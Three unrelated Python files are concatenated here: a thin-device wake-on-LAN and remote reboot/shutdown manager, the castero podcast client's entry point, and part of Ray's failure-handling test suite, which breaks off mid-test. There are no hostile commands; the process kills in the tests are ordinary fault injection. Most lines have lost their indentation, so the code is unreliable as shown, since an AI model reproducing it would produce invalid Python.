from polltask.tasks.thin_device.db.api import API
from xmlrpclib import ServerProxy
from oslo_config import cfg
from Queue import Queue
from polltask import logger
import subprocess
import threading
import socket
LOG = logger.get_default_logger(__name__)
CONF = cfg.CONF
CONF.import_opt('addrip', 'polltask.tasks.thin_device.device_manager')
class ConnectClient(object):
def __init__(self, queue=None, db=None, IP=None):
self.id = 0
self.IP = IP
self.mac = None
self.status="off-line"
self.db = db or API()
self.queue = queue
def get_client_ip(self, id):
try:
data = self.db.get_by_id(id)[0]
self.id = data.get('id', 0)
self.mac = data.get("MAC", None)
#if data and data['status'] == "on-line":
self.IP = data.get("ip", None)
        except (AttributeError, ValueError):
            raise ValueError("No device found with this ID.")
def start_dev(self):
try:
cmd = "wol -i {ip} {mac}".format(ip=self.IP, mac=self.mac)
result = subprocess.call(cmd.split(), shell=False)
#socket.setdefaulttimeout(10)
self.queue.put(result)
data = self.db.get_by_id(self.id)
status = data[0]['status'] if data else None
if status == self.status:
self.db.status(self.id, "waiting")
#self.db.status(self.id, self.status)
except Exception:
self.db.status(self.id, self.status)
self.queue.put(1)
def reboot(self):
try:
obj_instance=ServerProxy(CONF.addrip % self.IP)
socket.setdefaulttimeout(5)
result = obj_instance.reboot()
socket.setdefaulttimeout(None)
self.queue.put(result)
self.db.status(self.id, "waiting")
except Exception:
self.db.status(self.id, self.status)
self.queue.put(1)
def shutdown(self):
try:
obj_instance=ServerProxy(CONF.addrip % self.IP)
socket.setdefaulttimeout(5)
result = obj_instance.shutdown()
socket.setdefaulttimeout(None)
self.queue.put(result)
self.db.status(self.id, "waiting")
except Exception:
self.db.status(self.id, self.status)
self.queue.put(1)
class ConnectThread(object):
def __init__(self, device=[]):
self.device=device
self.threadpool = []
self.data = None
def start_threadpools(self):
queue = Queue(200)
for id in self.device:
conn = ConnectClient(queue=queue)
IP = conn.get_client_ip(id)
th = threading.Thread(target=conn.start_dev)
self.threadpool.append(th)
        for th in self.threadpool:
            th.start()
        # Wait for all threads so the devices are started in parallel
        for th in self.threadpool:
            th.join()
for i in xrange(len(self.device)):
LOG.info("start_device execute result %s" % queue.get())
self.data=queue
return queue
def reboot_threadpools(self):
queue = Queue(200)
for id in self.device:
conn = ConnectClient(queue=queue)
IP = conn.get_client_ip(id)
th = threading.Thread(target=conn.reboot)
self.threadpool.append(th)
        for th in self.threadpool:
            th.start()
        # Wait for all threads so the reboots run in parallel
        for th in self.threadpool:
            th.join()
for i in xrange(len(self.device)):
LOG.info("reboot execute result %s" % queue.get())
self.data=queue
return queue
def stop_threadpools(self):
queue = Queue(200)
for id in self.device:
conn = ConnectClient(queue=queue)
IP = conn.get_client_ip(id)
th = threading.Thread(target=conn.shutdown)
self.threadpool.append(th)
        for th in self.threadpool:
            th.start()
        # Wait for all threads so the shutdowns run in parallel
        for th in self.threadpool:
            th.join()
for i in xrange(len(self.device)):
LOG.info("stop execute result %s" % queue.get())
self.data=queue
return queue
if __name__=="__main__":
device = [6,7, 8,9,10,11,12,13,14,15]
m = ConnectThread(device)
#m.reboot_threadpools()
m.stop_threadpools()
for i in xrange(len(device)):
print m.data.get()
|
__main__.py
|
import curses
import sys
import threading
import re
import castero
from castero import helpers
from castero.config import Config
from castero.database import Database
from castero.display import Display
from castero.player import Player
def main():
database = Database()
# update fields in help menu text
for field in Config:
if "{%s}" % field in castero.__help__:
castero.__help__ = \
castero.__help__.replace(
"{%s}" % field,
Config[field].ljust(9)
)
elif "{%s|" % field in castero.__help__:
field2 = castero.__help__.split("{%s|" % field)[1].split("}")[0]
castero.__help__ = \
castero.__help__.replace(
"{%s|%s}" % (field, field2),
("%s or %s" % (Config[field], Config[field2])).ljust(9)
)
    remaining_brace_fields = re.compile(r'\{.*?\}').findall(castero.__help__)
for field in remaining_brace_fields:
adjusted = field.replace("{", "").replace("}", "").ljust(9)
castero.__help__ = \
castero.__help__.replace(field, adjusted)
# check if user is running the client with an info flag
info_flags = {
'help': ['-h', '--help'],
'version': ['-v', '--version']
}
    if sys.argv[-1] in info_flags['help']:
        print(castero.__help__)
        sys.exit(0)
    elif sys.argv[-1] in info_flags['version']:
        print(castero.__version__)
        sys.exit(0)
# instantiate the display object
stdscr = curses.initscr()
display = Display(stdscr, database)
display.clear()
display.update_parent_dimensions()
# check if we need to start reloading
if helpers.is_true(Config['reload_on_start']):
        reload_thread = threading.Thread(target=database.reload, args=[display])
reload_thread.start()
# run initial display operations
display.display()
display.update()
display.refresh()
# core loop for the client
running = True
while running:
display.display()
display.update()
display.refresh()
char = display.getch()
if char != -1:
running = display.handle_input(char)
sys.exit(0)
main()
|
test_failure.py
|
import json
import logging
import os
import sys
import tempfile
import threading
import time
import numpy as np
import pytest
import redis
import ray
import ray.ray_constants as ray_constants
from ray.cluster_utils import Cluster
from ray.test_utils import (
relevant_errors,
wait_for_condition,
wait_for_errors,
RayTestTimeoutException,
SignalActor,
)
def test_failed_task(ray_start_regular):
@ray.remote
def throw_exception_fct1():
raise Exception("Test function 1 intentionally failed.")
@ray.remote
def throw_exception_fct2():
raise Exception("Test function 2 intentionally failed.")
@ray.remote(num_return_vals=3)
def throw_exception_fct3(x):
raise Exception("Test function 3 intentionally failed.")
throw_exception_fct1.remote()
throw_exception_fct1.remote()
wait_for_errors(ray_constants.TASK_PUSH_ERROR, 2)
assert len(relevant_errors(ray_constants.TASK_PUSH_ERROR)) == 2
for task in relevant_errors(ray_constants.TASK_PUSH_ERROR):
msg = task.get("message")
assert "Test function 1 intentionally failed." in msg
x = throw_exception_fct2.remote()
try:
ray.get(x)
except Exception as e:
assert "Test function 2 intentionally failed." in str(e)
else:
# ray.get should throw an exception.
assert False
x, y, z = throw_exception_fct3.remote(1.0)
for ref in [x, y, z]:
try:
ray.get(ref)
except Exception as e:
assert "Test function 3 intentionally failed." in str(e)
else:
# ray.get should throw an exception.
assert False
class CustomException(ValueError):
pass
@ray.remote
def f():
raise CustomException("This function failed.")
try:
ray.get(f.remote())
except Exception as e:
assert "This function failed." in str(e)
assert isinstance(e, CustomException)
assert isinstance(e, ray.exceptions.RayTaskError)
assert "RayTaskError(CustomException)" in repr(e)
else:
# ray.get should throw an exception.
assert False
def test_get_throws_quickly_when_found_exception(ray_start_regular):
# We use an actor instead of functions here. If we use functions, it's
# very likely that two normal tasks are submitted before the first worker
# is registered to Raylet. Since `maximum_startup_concurrency` is 1,
# the worker pool will wait for the registration of the first worker
# and skip starting new workers. The result is, the two tasks will be
# executed sequentially, which breaks an assumption of this test case -
# the two tasks run in parallel.
@ray.remote
class Actor(object):
def bad_func1(self):
raise Exception("Test function intentionally failed.")
def bad_func2(self):
os._exit(0)
def slow_func(self, signal):
ray.get(signal.wait.remote())
def expect_exception(objects, exception):
with pytest.raises(ray.exceptions.RayError) as err:
ray.get(objects)
assert err.type is exception
signal1 = SignalActor.remote()
actor = Actor.options(max_concurrency=2).remote()
expect_exception(
[actor.bad_func1.remote(),
actor.slow_func.remote(signal1)], ray.exceptions.RayTaskError)
ray.get(signal1.send.remote())
signal2 = SignalActor.remote()
actor = Actor.options(max_concurrency=2).remote()
expect_exception(
[actor.bad_func2.remote(),
actor.slow_func.remote(signal2)], ray.exceptions.RayActorError)
ray.get(signal2.send.remote())
def test_fail_importing_remote_function(ray_start_2_cpus):
# Create the contents of a temporary Python file.
temporary_python_file = """
def temporary_helper_function():
return 1
"""
f = tempfile.NamedTemporaryFile(suffix=".py")
f.write(temporary_python_file.encode("ascii"))
f.flush()
directory = os.path.dirname(f.name)
# Get the module name and strip ".py" from the end.
module_name = os.path.basename(f.name)[:-3]
sys.path.append(directory)
module = __import__(module_name)
# Define a function that closes over this temporary module. This should
# fail when it is unpickled.
@ray.remote
def g(x, y=3):
try:
module.temporary_python_file()
except Exception:
# This test is not concerned with the error from running this
# function. Only from unpickling the remote function.
pass
# Invoke the function so that the definition is exported.
g.remote(1, y=2)
wait_for_errors(ray_constants.REGISTER_REMOTE_FUNCTION_PUSH_ERROR, 2)
errors = relevant_errors(ray_constants.REGISTER_REMOTE_FUNCTION_PUSH_ERROR)
assert len(errors) >= 2, errors
assert "No module named" in errors[0]["message"]
assert "No module named" in errors[1]["message"]
# Check that if we try to call the function it throws an exception and
# does not hang.
for _ in range(10):
with pytest.raises(
Exception, match="This function was not imported properly."):
ray.get(g.remote(1, y=2))
f.close()
# Clean up the junk we added to sys.path.
sys.path.pop(-1)
def test_failed_function_to_run(ray_start_2_cpus):
def f(worker):
if ray.worker.global_worker.mode == ray.WORKER_MODE:
raise Exception("Function to run failed.")
ray.worker.global_worker.run_function_on_all_workers(f)
wait_for_errors(ray_constants.FUNCTION_TO_RUN_PUSH_ERROR, 2)
# Check that the error message is in the task info.
errors = relevant_errors(ray_constants.FUNCTION_TO_RUN_PUSH_ERROR)
assert len(errors) == 2
assert "Function to run failed." in errors[0]["message"]
assert "Function to run failed." in errors[1]["message"]
def test_fail_importing_actor(ray_start_regular):
# Create the contents of a temporary Python file.
temporary_python_file = """
def temporary_helper_function():
return 1
"""
f = tempfile.NamedTemporaryFile(suffix=".py")
f.write(temporary_python_file.encode("ascii"))
f.flush()
directory = os.path.dirname(f.name)
# Get the module name and strip ".py" from the end.
module_name = os.path.basename(f.name)[:-3]
sys.path.append(directory)
module = __import__(module_name)
# Define an actor that closes over this temporary module. This should
# fail when it is unpickled.
@ray.remote
class Foo:
def __init__(self, arg1, arg2=3):
self.x = module.temporary_python_file()
def get_val(self, arg1, arg2=3):
return 1
# There should be no errors yet.
assert len(ray.errors()) == 0
# Create an actor.
foo = Foo.remote(3, arg2=0)
# Wait for the error to arrive.
wait_for_errors(ray_constants.REGISTER_ACTOR_PUSH_ERROR, 1)
errors = relevant_errors(ray_constants.REGISTER_ACTOR_PUSH_ERROR)
assert "No module named" in errors[0]["message"]
# Wait for the error from when the __init__ tries to run.
wait_for_errors(ray_constants.TASK_PUSH_ERROR, 1)
errors = relevant_errors(ray_constants.TASK_PUSH_ERROR)
assert ("failed to be imported, and so cannot execute this method" in
errors[0]["message"])
# Check that if we try to get the function it throws an exception and
# does not hang.
with pytest.raises(Exception, match="failed to be imported"):
ray.get(foo.get_val.remote(1, arg2=2))
# Wait for the error from when the call to get_val.
wait_for_errors(ray_constants.TASK_PUSH_ERROR, 2)
errors = relevant_errors(ray_constants.TASK_PUSH_ERROR)
assert ("failed to be imported, and so cannot execute this method" in
errors[1]["message"])
f.close()
# Clean up the junk we added to sys.path.
sys.path.pop(-1)
def test_failed_actor_init(ray_start_regular):
error_message1 = "actor constructor failed"
error_message2 = "actor method failed"
@ray.remote
class FailedActor:
def __init__(self):
raise Exception(error_message1)
def fail_method(self):
raise Exception(error_message2)
a = FailedActor.remote()
# Make sure that we get errors from a failed constructor.
wait_for_errors(ray_constants.TASK_PUSH_ERROR, 1)
errors = relevant_errors(ray_constants.TASK_PUSH_ERROR)
assert len(errors) == 1
assert error_message1 in errors[0]["message"]
# Make sure that we get errors from a failed method.
a.fail_method.remote()
wait_for_errors(ray_constants.TASK_PUSH_ERROR, 2)
errors = relevant_errors(ray_constants.TASK_PUSH_ERROR)
assert len(errors) == 2
assert error_message1 in errors[1]["message"]
def test_failed_actor_method(ray_start_regular):
error_message2 = "actor method failed"
@ray.remote
class FailedActor:
def __init__(self):
pass
def fail_method(self):
raise Exception(error_message2)
a = FailedActor.remote()
# Make sure that we get errors from a failed method.
a.fail_method.remote()
wait_for_errors(ray_constants.TASK_PUSH_ERROR, 1)
errors = relevant_errors(ray_constants.TASK_PUSH_ERROR)
assert len(errors) == 1
assert error_message2 in errors[0]["message"]
def test_incorrect_method_calls(ray_start_regular):
@ray.remote
class Actor:
def __init__(self, missing_variable_name):
pass
def get_val(self, x):
pass
# Make sure that we get errors if we call the constructor incorrectly.
# Create an actor with too few arguments.
with pytest.raises(Exception):
a = Actor.remote()
# Create an actor with too many arguments.
with pytest.raises(Exception):
a = Actor.remote(1, 2)
# Create an actor the correct number of arguments.
a = Actor.remote(1)
# Call a method with too few arguments.
with pytest.raises(Exception):
a.get_val.remote()
# Call a method with too many arguments.
with pytest.raises(Exception):
a.get_val.remote(1, 2)
# Call a method that doesn't exist.
with pytest.raises(AttributeError):
a.nonexistent_method()
with pytest.raises(AttributeError):
a.nonexistent_method.remote()
def test_worker_raising_exception(ray_start_regular):
@ray.remote(max_calls=2)
def f():
# This is the only reasonable variable we can set here that makes the
# execute_task function fail after the task got executed.
worker = ray.worker.global_worker
worker.function_actor_manager.increase_task_counter = None
# Running this task should cause the worker to raise an exception after
# the task has successfully completed.
f.remote()
wait_for_errors(ray_constants.WORKER_CRASH_PUSH_ERROR, 1)
def test_worker_dying(ray_start_regular):
# Define a remote function that will kill the worker that runs it.
@ray.remote(max_retries=0)
def f():
eval("exit()")
with pytest.raises(ray.exceptions.RayWorkerError):
ray.get(f.remote())
wait_for_errors(ray_constants.WORKER_DIED_PUSH_ERROR, 1)
errors = relevant_errors(ray_constants.WORKER_DIED_PUSH_ERROR)
assert len(errors) == 1
assert "died or was killed while executing" in errors[0]["message"]
def test_actor_worker_dying(ray_start_regular):
@ray.remote
class Actor:
def kill(self):
eval("exit()")
@ray.remote
def consume(x):
pass
a = Actor.remote()
[obj], _ = ray.wait([a.kill.remote()], timeout=5)
with pytest.raises(ray.exceptions.RayActorError):
ray.get(obj)
with pytest.raises(ray.exceptions.RayTaskError):
ray.get(consume.remote(obj))
wait_for_errors(ray_constants.WORKER_DIED_PUSH_ERROR, 1)
def test_actor_worker_dying_future_tasks(ray_start_regular):
@ray.remote(max_restarts=0)
class Actor:
def getpid(self):
return os.getpid()
def sleep(self):
time.sleep(1)
a = Actor.remote()
pid = ray.get(a.getpid.remote())
tasks1 = [a.sleep.remote() for _ in range(10)]
os.kill(pid, 9)
time.sleep(0.1)
tasks2 = [a.sleep.remote() for _ in range(10)]
for obj in tasks1 + tasks2:
with pytest.raises(Exception):
ray.get(obj)
wait_for_errors(ray_constants.WORKER_DIED_PUSH_ERROR, 1)
def test_actor_worker_dying_nothing_in_progress(ray_start_regular):
@ray.remote(max_restarts=0)
class Actor:
def getpid(self):
return os.getpid()
a = Actor.remote()
pid = ray.get(a.getpid.remote())
os.kill(pid, 9)
time.sleep(0.1)
task2 = a.getpid.remote()
with pytest.raises(Exception):
ray.get(task2)
def test_actor_scope_or_intentionally_killed_message(ray_start_regular):
@ray.remote
class Actor:
pass
a = Actor.remote()
a = Actor.remote()
a.__ray_terminate__.remote()
time.sleep(1)
assert len(
        ray.errors()) == 0, ("Should not have propagated an error - {}".format(
ray.errors()))
@pytest.mark.skip("This test does not work yet.")
@pytest.mark.parametrize(
"ray_start_object_store_memory", [10**6], indirect=True)
def test_put_error1(ray_start_object_store_memory):
num_objects = 3
object_size = 4 * 10**5
# Define a task with a single dependency, a numpy array, that returns
# another array.
@ray.remote
def single_dependency(i, arg):
arg = np.copy(arg)
arg[0] = i
return arg
@ray.remote
def put_arg_task():
# Launch num_objects instances of the remote task, each dependent
# on the one before it. The result of the first task should get
# evicted.
args = []
arg = single_dependency.remote(0, np.zeros(
object_size, dtype=np.uint8))
for i in range(num_objects):
arg = single_dependency.remote(i, arg)
args.append(arg)
# Get the last value to force all tasks to finish.
value = ray.get(args[-1])
assert value[0] == i
# Get the first value (which should have been evicted) to force
# reconstruction. Currently, since we're not able to reconstruct
# `ray.put` objects that were evicted and whose originating tasks
# are still running, this for-loop should hang and push an error to
# the driver.
ray.get(args[0])
put_arg_task.remote()
# Make sure we receive the correct error message.
wait_for_errors(ray_constants.PUT_RECONSTRUCTION_PUSH_ERROR, 1)
@pytest.mark.skip("This test does not work yet.")
@pytest.mark.parametrize(
"ray_start_object_store_memory", [10**6], indirect=True)
def test_put_error2(ray_start_object_store_memory):
# This is the same as the previous test, but it calls ray.put directly.
num_objects = 3
object_size = 4 * 10**5
# Define a task with a single dependency, a numpy array, that returns
# another array.
@ray.remote
def single_dependency(i, arg):
arg = np.copy(arg)
arg[0] = i
return arg
@ray.remote
def put_task():
# Launch num_objects instances of the remote task, each dependent
# on the one before it. The result of the first task should get
# evicted.
args = []
arg = ray.put(np.zeros(object_size, dtype=np.uint8))
for i in range(num_objects):
arg = single_dependency.remote(i, arg)
args.append(arg)
# Get the last value to force all tasks to finish.
value = ray.get(args[-1])
assert value[0] == i
# Get the first value (which should have been evicted) to force
# reconstruction. Currently, since we're not able to reconstruct
# `ray.put` objects that were evicted and whose originating tasks
# are still running, this for-loop should hang and push an error to
# the driver.
ray.get(args[0])
put_task.remote()
# Make sure we receive the correct error message.
wait_for_errors(ray_constants.PUT_RECONSTRUCTION_PUSH_ERROR, 1)
def test_version_mismatch(shutdown_only):
ray_version = ray.__version__
ray.__version__ = "fake ray version"
ray.init(num_cpus=1)
wait_for_errors(ray_constants.VERSION_MISMATCH_PUSH_ERROR, 1)
# Reset the version.
ray.__version__ = ray_version
def test_export_large_objects(ray_start_regular):
import ray.ray_constants as ray_constants
large_object = np.zeros(2 * ray_constants.PICKLE_OBJECT_WARNING_SIZE)
@ray.remote
def f():
large_object
# Invoke the function so that the definition is exported.
f.remote()
# Make sure that a warning is generated.
wait_for_errors(ray_constants.PICKLING_LARGE_OBJECT_PUSH_ERROR, 1)
@ray.remote
class Foo:
def __init__(self):
large_object
Foo.remote()
# Make sure that a warning is generated.
wait_for_errors(ray_constants.PICKLING_LARGE_OBJECT_PUSH_ERROR, 2)
@pytest.mark.skip(reason="TODO detect resource deadlock")
def test_warning_for_resource_deadlock(shutdown_only):
# Check that we get warning messages for infeasible tasks.
ray.init(num_cpus=1)
@ray.remote(num_cpus=1)
class Foo:
def f(self):
return 0
@ray.remote
def f():
# Creating both actors is not possible.
actors = [Foo.remote() for _ in range(2)]
for a in actors:
ray.get(a.f.remote())
# Run in a task to check we handle the blocked task case correctly
f.remote()
wait_for_errors(ray_constants.RESOURCE_DEADLOCK_ERROR, 1, timeout=30)
def test_warning_for_infeasible_tasks(ray_start_regular):
# Check that we get warning messages for infeasible tasks.
@ray.remote(num_gpus=1)
def f():
pass
@ray.remote(resources={"Custom": 1})
class Foo:
pass
# This task is infeasible.
f.remote()
wait_for_errors(ray_constants.INFEASIBLE_TASK_ERROR, 1)
# This actor placement task is infeasible.
Foo.remote()
wait_for_errors(ray_constants.INFEASIBLE_TASK_ERROR, 2)
def test_warning_for_infeasible_zero_cpu_actor(shutdown_only):
# Check that we cannot place an actor on a 0 CPU machine and that we get an
# infeasibility warning (even though the actor creation task itself
# requires no CPUs).
ray.init(num_cpus=0)
@ray.remote
class Foo:
pass
# The actor creation should be infeasible.
Foo.remote()
wait_for_errors(ray_constants.INFEASIBLE_TASK_ERROR, 1)
def test_warning_for_too_many_actors(shutdown_only):
# Check that if we run a workload which requires too many workers to be
# started that we will receive a warning.
num_cpus = 2
ray.init(num_cpus=num_cpus)
@ray.remote
class Foo:
def __init__(self):
time.sleep(1000)
[Foo.remote() for _ in range(num_cpus * 3)]
wait_for_errors(ray_constants.WORKER_POOL_LARGE_ERROR, 1)
[Foo.remote() for _ in range(num_cpus)]
wait_for_errors(ray_constants.WORKER_POOL_LARGE_ERROR, 2)
def test_warning_for_too_many_nested_tasks(shutdown_only):
# Check that if we run a workload which requires too many workers to be
# started that we will receive a warning.
num_cpus = 2
ray.init(num_cpus=num_cpus)
@ray.remote
def f():
time.sleep(1000)
return 1
@ray.remote
def h():
time.sleep(1)
ray.get(f.remote())
@ray.remote
def g():
# Sleep so that the f tasks all get submitted to the scheduler after
# the g tasks.
time.sleep(1)
ray.get(h.remote())
[g.remote() for _ in range(num_cpus * 4)]
wait_for_errors(ray_constants.WORKER_POOL_LARGE_ERROR, 1)
def test_warning_for_many_duplicate_remote_functions_and_actors(shutdown_only):
ray.init(num_cpus=1)
@ray.remote
def create_remote_function():
@ray.remote
def g():
return 1
return ray.get(g.remote())
for _ in range(ray_constants.DUPLICATE_REMOTE_FUNCTION_THRESHOLD - 1):
ray.get(create_remote_function.remote())
import io
log_capture_string = io.StringIO()
ch = logging.StreamHandler(log_capture_string)
# TODO(rkn): It's terrible to have to rely on this implementation detail,
# the fact that the warning comes from ray.import_thread.logger. However,
# I didn't find a good way to capture the output for all loggers
# simultaneously.
ray.import_thread.logger.addHandler(ch)
ray.get(create_remote_function.remote())
start_time = time.time()
while time.time() < start_time + 10:
log_contents = log_capture_string.getvalue()
if len(log_contents) > 0:
break
ray.import_thread.logger.removeHandler(ch)
assert "remote function" in log_contents
assert "has been exported {} times.".format(
ray_constants.DUPLICATE_REMOTE_FUNCTION_THRESHOLD) in log_contents
# Now test the same thing but for actors.
@ray.remote
def create_actor_class():
# Require a GPU so that the actor is never actually created and we
# don't spawn an unreasonable number of processes.
@ray.remote(num_gpus=1)
class Foo:
pass
Foo.remote()
for _ in range(ray_constants.DUPLICATE_REMOTE_FUNCTION_THRESHOLD - 1):
ray.get(create_actor_class.remote())
log_capture_string = io.StringIO()
ch = logging.StreamHandler(log_capture_string)
# TODO(rkn): As mentioned above, it's terrible to have to rely on this
# implementation detail.
ray.import_thread.logger.addHandler(ch)
ray.get(create_actor_class.remote())
start_time = time.time()
while time.time() < start_time + 10:
log_contents = log_capture_string.getvalue()
if len(log_contents) > 0:
break
ray.import_thread.logger.removeHandler(ch)
assert "actor" in log_contents
assert "has been exported {} times.".format(
ray_constants.DUPLICATE_REMOTE_FUNCTION_THRESHOLD) in log_contents
def test_redis_module_failure(ray_start_regular):
address_info = ray_start_regular
address = address_info["redis_address"]
address = address.split(":")
assert len(address) == 2
def run_failure_test(expecting_message, *command):
with pytest.raises(
Exception, match=".*{}.*".format(expecting_message)):
client = redis.StrictRedis(
host=address[0],
port=int(address[1]),
password=ray_constants.REDIS_DEFAULT_PASSWORD)
client.execute_command(*command)
def run_one_command(*command):
client = redis.StrictRedis(
host=address[0],
port=int(address[1]),
password=ray_constants.REDIS_DEFAULT_PASSWORD)
client.execute_command(*command)
run_failure_test("wrong number of arguments", "RAY.TABLE_ADD", 13)
run_failure_test("Prefix must be in the TablePrefix range",
"RAY.TABLE_ADD", 100000, 1, 1, 1)
run_failure_test("Prefix must be in the TablePrefix range",
"RAY.TABLE_REQUEST_NOTIFICATIONS", 100000, 1, 1, 1)
run_failure_test("Prefix must be a valid TablePrefix integer",
"RAY.TABLE_ADD", b"a", 1, 1, 1)
run_failure_test("Pubsub channel must be in the TablePubsub range",
"RAY.TABLE_ADD", 1, 10000, 1, 1)
run_failure_test("Pubsub channel must be a valid integer", "RAY.TABLE_ADD",
1, b"a", 1, 1)
# Change the key from 1 to 2, since the previous command should have
# succeeded at writing the key, but not publishing it.
run_failure_test("Index is less than 0.", "RAY.TABLE_APPEND", 1, 1, 2, 1,
-1)
run_failure_test("Index is not a number.", "RAY.TABLE_APPEND", 1, 1, 2, 1,
b"a")
run_one_command("RAY.TABLE_APPEND", 1, 1, 2, 1)
# It's okay to add duplicate entries.
run_one_command("RAY.TABLE_APPEND", 1, 1, 2, 1)
run_one_command("RAY.TABLE_APPEND", 1, 1, 2, 1, 0)
run_one_command("RAY.TABLE_APPEND", 1, 1, 2, 1, 1)
run_one_command("RAY.SET_ADD", 1, 1, 3, 1)
    # It's okay to add duplicate entries.
run_one_command("RAY.SET_ADD", 1, 1, 3, 1)
run_one_command("RAY.SET_REMOVE", 1, 1, 3, 1)
    # It's okay to remove duplicate entries.
run_one_command("RAY.SET_REMOVE", 1, 1, 3, 1)
# Note that this test will take at least 10 seconds because it must wait for
# the monitor to detect enough missed heartbeats.
def test_warning_for_dead_node(ray_start_cluster_2_nodes):
cluster = ray_start_cluster_2_nodes
cluster.wait_for_nodes()
node_ids = {item["NodeID"] for item in ray.nodes()}
# Try to make sure that the monitor has received at least one heartbeat
# from the node.
time.sleep(0.5)
# Kill both raylets.
cluster.list_all_nodes()[1].kill_raylet()
cluster.list_all_nodes()[0].kill_raylet()
# Check that we get warning messages for both raylets.
wait_for_errors(ray_constants.REMOVED_NODE_ERROR, 2, timeout=40)
# Extract the client IDs from the error messages. This will need to be
# changed if the error message changes.
warning_node_ids = {
item["message"].split(" ")[5]
for item in relevant_errors(ray_constants.REMOVED_NODE_ERROR)
}
assert node_ids == warning_node_ids
def test_raylet_crash_when_get(ray_start_regular):
def sleep_to_kill_raylet():
# Don't kill raylet before default workers get connected.
time.sleep(2)
ray.worker._global_node.kill_raylet()
object_ref = ray.put(np.zeros(200 * 1024, dtype=np.uint8))
ray.internal.free(object_ref)
thread = threading.Thread(target=sleep_to_kill_raylet)
thread.start()
with pytest.raises(ray.exceptions.UnreconstructableError):
ray.get(object_ref)
thread.join()
def test_connect_with_disconnected_node(shutdown_only):
config = json.dumps({
"num_heartbeats_timeout": 50,
"raylet_heartbeat_timeout_milliseconds": 10,
})
cluster = Cluster()
cluster.add_node(num_cpus=0, _internal_config=config)
ray.init(address=cluster.address)
info = relevant_errors(ray_constants.REMOVED_NODE_ERROR)
assert len(info) == 0
# This node is killed by SIGKILL, ray_monitor will mark it to dead.
dead_node = cluster.add_node(num_cpus=0)
cluster.remove_node(dead_node, allow_graceful=False)
wait_for_errors(ray_constants.REMOVED_NODE_ERROR, 1)
# This node is killed by SIGKILL, ray_monitor will mark it to dead.
dead_node = cluster.add_node(num_cpus=0)
cluster.remove_node(dead_node, allow_graceful=False)
wait_for_errors(ray_constants.REMOVED_NODE_ERROR, 2)
# This node is killed by SIGTERM, ray_monitor will not mark it again.
removing_node = cluster.add_node(num_cpus=0)
cluster.remove_node(removing_node, allow_graceful=True)
with pytest.raises(RayTestTimeoutException):
wait_for_errors(ray_constants.REMOVED_NODE_ERROR, 3, timeout=2)
# There is no connection error to a dead node.
info = relevant_errors(ray_constants.RAYLET_CONNECTION_ERROR)
assert len(info) == 0
@pytest.mark.parametrize(
"ray_start_cluster_head", [{
"num_cpus": 5,
"object_store_memory": 10**8,
"_internal_config": json.dumps({
"object_store_full_max_retries": 0
})
}],
indirect=True)
def test_parallel_actor_fill_plasma_retry(ray_start_cluster_head):
@ray.remote
class LargeMemoryActor:
def some_expensive_task(self):
return np.zeros(10**8 // 2, dtype=np.uint8)
actors = [LargeMemoryActor.remote() for _ in range(5)]
for _ in range(10):
pending = [a.some_expensive_task.remote() for a in actors]
while pending:
[done], pending = ray.wait(pending, num_returns=1)
def test_fill_object_store_exception(shutdown_only):
ray.init(
num_cpus=2,
object_store_memory=10**8,
_internal_config=json.dumps({
"object_store_full_max_retries": 0
}))
@ray.remote
def expensive_task():
return np.zeros((10**8) // 10, dtype=np.uint8)
with pytest.raises(ray.exceptions.RayTaskError) as e:
ray.get([expensive_task.remote() for _ in range(20)])
with pytest.raises(ray.exceptions.ObjectStoreFullError):
raise e.as_instanceof_cause()
@ray.remote
class LargeMemoryActor:
def some_expensive_task(self):
return np.zeros(10**8 + 2, dtype=np.uint8)
def test(self):
return 1
actor = LargeMemoryActor.remote()
with pytest.raises(ray.exceptions.RayTaskError):
ray.get(actor.some_expensive_task.remote())
# Make sure actor does not die
ray.get(actor.test.remote())
with pytest.raises(ray.exceptions.ObjectStoreFullError):
ray.put(np.zeros(10**8 + 2, dtype=np.uint8))
def test_fill_object_store_lru_fallback(shutdown_only):
config = json.dumps({
"free_objects_batch_size": 1,
})
ray.init(
num_cpus=2,
object_store_memory=10**8,
lru_evict=True,
_internal_config=config)
@ray.remote
def expensive_task():
return np.zeros((10**8) // 2, dtype=np.uint8)
# Check that objects out of scope are cleaned up quickly.
ray.get(expensive_task.remote())
start = time.time()
for _ in range(3):
ray.get(expensive_task.remote())
end = time.time()
assert end - start < 3
obj_refs = []
for _ in range(3):
obj_ref = expensive_task.remote()
ray.get(obj_ref)
obj_refs.append(obj_ref)
@ray.remote
class LargeMemoryActor:
def some_expensive_task(self):
return np.zeros(10**8 // 2, dtype=np.uint8)
def test(self):
return 1
actor = LargeMemoryActor.remote()
for _ in range(3):
obj_ref = actor.some_expensive_task.remote()
ray.get(obj_ref)
obj_refs.append(obj_ref)
# Make sure actor does not die
ray.get(actor.test.remote())
for _ in range(3):
obj_ref = ray.put(np.zeros(10**8 // 2, dtype=np.uint8))
ray.get(obj_ref)
obj_refs.append(obj_ref)
@pytest.mark.parametrize(
"ray_start_cluster", [{
"num_nodes": 1,
"num_cpus": 2,
}, {
"num_nodes": 2,
"num_cpus": 1,
}],
indirect=True)
def test_eviction(ray_start_cluster):
@ray.remote
def large_object():
return np.zeros(10 * 1024 * 1024)
obj = large_object.remote()
assert (isinstance(ray.get(obj), np.ndarray))
# Evict the object.
ray.internal.free([obj])
# ray.get throws an exception.
with pytest.raises(ray.exceptions.UnreconstructableError):
ray.get(obj)
@ray.remote
def dependent_task(x):
return
# If the object is passed by reference, the task throws an
# exception.
with pytest.raises(ray.exceptions.RayTaskError):
ray.get(dependent_task.remote(obj))
@pytest.mark.parametrize(
"ray_start_cluster", [{
"num_nodes": 2,
"num_cpus": 1,
}, {
"num_nodes": 1,
"num_cpus": 2,
}],
indirect=True)
def test_serialized_id(ray_start_cluster):
@ray.remote
def small_object():
# Sleep a bit before creating the object to force a timeout
# at the getter.
time.sleep(1)
return 1
@ray.remote
def dependent_task(x):
return x
@ray.remote
def get(obj_refs, test_dependent_task):
print("get", obj_refs)
obj_ref = obj_refs[0]
if test_dependent_task:
assert ray.get(dependent_task.remote(obj_ref)) == 1
else:
assert ray.get(obj_ref) == 1
obj = small_object.remote()
ray.get(get.remote([obj], False))
obj = small_object.remote()
ray.get(get.remote([obj], True))
obj = ray.put(1)
ray.get(get.remote([obj], False))
obj = ray.put(1)
ray.get(get.remote([obj], True))
@pytest.mark.parametrize("use_actors,node_failure",
[(False, False), (False, True), (True, False),
(True, True)])
def test_fate_sharing(ray_start_cluster, use_actors, node_failure):
config = json.dumps({
"num_heartbeats_timeout": 10,
"raylet_heartbeat_timeout_milliseconds": 100,
